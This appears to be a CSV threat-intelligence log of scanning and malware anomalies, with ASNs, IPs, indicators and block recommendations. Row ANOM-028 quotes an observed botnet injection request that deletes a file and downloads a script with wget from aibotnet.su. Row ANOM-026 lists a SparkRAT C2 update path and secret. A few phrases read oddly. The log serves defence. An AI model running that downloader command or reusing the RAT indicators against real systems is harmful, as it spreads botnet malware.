anomaly_id,severity,asn,asn_org,description,indicator,evidence,action_recommended ANOM-026,CRITICAL,AS200651,FlokiNET ehf,SPARKRAT retrofit on confirmed Tor exit node,"POST /api/client/update?arch=amd64&commit=08059e95dacafe0bf6e5782f8e2c8ec9cd8c5a17&os=windows UA SPARK COMMIT","Censys GreyNoise tags now include 'SparkRAT Client Update Scanner'; secret=3de172c65c5204dbce4c985d6616ca6fbbf337be4ddd40746307af802fa510a2 in headers","Block 185.100.87.136 + treat as dual-use Tor exit AND SPARKRAT-C2 communication. Block /api/client/update across the network edge." ANOM-027,CRITICAL,AS216139,Iron Hosting Centre,Sequential port 6001-6050 uniform cluster in Censys aggregation,"Port 6001 to 6050 each showing ~345 events on AS216139 in Censys aggregation",Censys host.services.port aggregation reveals values 345-348 across sequential high ports 6001-50,"Investigate whether 46.30.46.124 is a backconnect-C2 listener farm or scanning appliance. Block high-port range 6000-6050 from AS216139 sources defensively." ANOM-028,CRITICAL,AS57043,Hostkey B.v.,IoT botnet MIPS downloader from new Hostkey IP,"IP 132.243.194.215 (Frankfurt) GET /shell?cd+/tmp;rm+-rf+kla.sh;wget+http://aibotnet.su/bins/kla.sh on port 6001","3 separate events on 2026-07-16 from Frankfurt (Hostkey B.v. / DE); IP reverse DNS = odamanov600.ru; Netaxis Group registration 2026-03-06 (~4 months old IP)","Block 132.243.194.215, takedown request for aibotnet.su domain, monitor for repeat IP-block scans. Add Hostkey B.v. Frankfurt espionage observation." ANOM-029,HIGH,AS209847/FORTIS,Baykov Ilya Sergeevich,Active HTTPS hallucination scanning from new FORTIS network with OpenSSH regreSSHion vuln,"IP 45.144.28.70 -- 998 Sponge sessions in 1 week, SSH banner OpenSSH_8.9p1 Ubuntu-3.16 with CVE-2024-6387 KEV + 22 other CVEs; BGP prefix 45.144.28.0/24 created 2026-06-06","Censys grey-noise malicious tagging; BULLETPROOF label present on host; network reg 2026-06-06 by Baykov Ilya Sergeevich (RU); single plausible SSH-only service 1 SSH port","Block 45.144.28.70 at the edge. Engage abuse@fortis.host for takedown references (expect no response)." ANOM-030,HIGH,AS211720,Datashield Inc.,MSSQL TDS brute pivoting to Visual Production channels,"185.231.33.46 stuck on port 1433 MSSQL TDS probes; hostname short-tan-rat; self-signed cert prohaska.beatty.biz with TLS 1.0/1.1 still enabled","Censys enrichment confirms 1 service (HTTP/443 with Apache server) + JARM 07d19d...; previously scanned /ews/ (Exchange) now shifted to MSSQL probing -- likely SQL Server INTERNET leg of attack","Block 185.231.33.46 from any ports 1433/1434 communication outbound; review all MSSQL exposure to non-trusted networks." ANOM-031,HIGH,AS51396,Pfcloud UG,New tooling 'odin-scanner/0.4' + 'Hello World' UAs deployed.clear,"Distinctive user-agent strings observed scanning SOCKS-style ports (11235, 20128)","Honeylabs fingerprinted UAs from 38 events + 12 events respectively on PFCLOUD IPs -- not seen in prior weeks","Mutate blocklists to include these UAs. Block outbound from PFCLOUD RO/NL networks (176.65.x.x, 204.76.203.0/24, 45.135.193.0/24)." ANOM-032,HIGH,AS14956,RouterHosting LLC,Exposed Werkzeug fofa_monitor panel on port 5000 (Weak Basic Auth + HTTP -- not HTTPS),"Werkzeug/3.1.8 Python/3.12.3 server with HTTP/1.1 401 + WWW-Authenticate: Basic realm=\"fofa_monitor\" on port 5000 of 216.126.239.17","Censys flagged CENSYS-2022-1002 Unencrypted HTTP Weak Auth (HIGH). Likely a fofa-monitor panel to track attack campaigns.","Block port 5000 from 216.126.239.17 outbound AND inbound (block all incoming probe traffic). Take the panel off the internet -- it is MCAF exposed." ANOM-033,MEDIUM,AS51852,Private Layer INC,IP rotation to 81.17.28.130 (new segment) with same OpenSSH HASSH flood profile,"Top IP rotated from 179.43.134.114 (prior) to 81.17.28.130 (current). Same OpenSSH 8.9p1 HASSH server.","Censys enrichment shows 81.17.28.128/27 RIPE CIDR owned by Private Layer INC; previously unseen host","Block 81.17.28.0/24 socks and watch for further 81.17.x.x range activity expansion." ANOM-034,MEDIUM,AS198953,Proton66 OOO,New Redis reconnaissance + RDP-variant ports (3395/3396/3399) targeted,"37.77.150.83 hit port 6379 3x (Redis). 193.143.1.66 hit ports 3395/3396/3399 -- non-standard RDP-variant ports.","18+3 events across 2 new IPs","Block 176.120.22.0/24 and 37.77.150.x.x for RDP/Redis brute reconnaissance." ANOM-035,MEDIUM,AS214940,Kprohost LLC,Massive UA rotation expanded to 20+ browser UAs including Konqueror 3.0-rc4, Android HTC Tattoo 1.6, IE 10, IE 6, YaBrowser","20+ distinct UAs from 3 KPRONET IPs (77.83.39.119, .42, .94) over port 443","Censys GreyNoise malicious classification with ENV Crawler tag -- new .env scanning related evidence","Block 77.83.39.0/24 fully -- previous WAH aggressive evasion has escalated to user-agent laundering." ANOM-036,MEDIUM,AS400992,ZhouyiSat Comm,Census return pure WINDOWS admin port profile indicates shift to WMI/RPC/SMB brute,"Censys port aggregation shows 95 RDP/5985 WinRM/135 RPC/139 NetBIOS/445 SMB/47001 -- only small portion on Linux (44/80, ssh 22:44)","Prior week observed /.env scanning which has stopped; current week shows no honeypot hits but census footprint unchanged essentially -- suggests IP rotation away from sensors","Block 23.172.217.0/24 + 185.121.15.0/24 + 193.46.218.0/24 at internet-edge."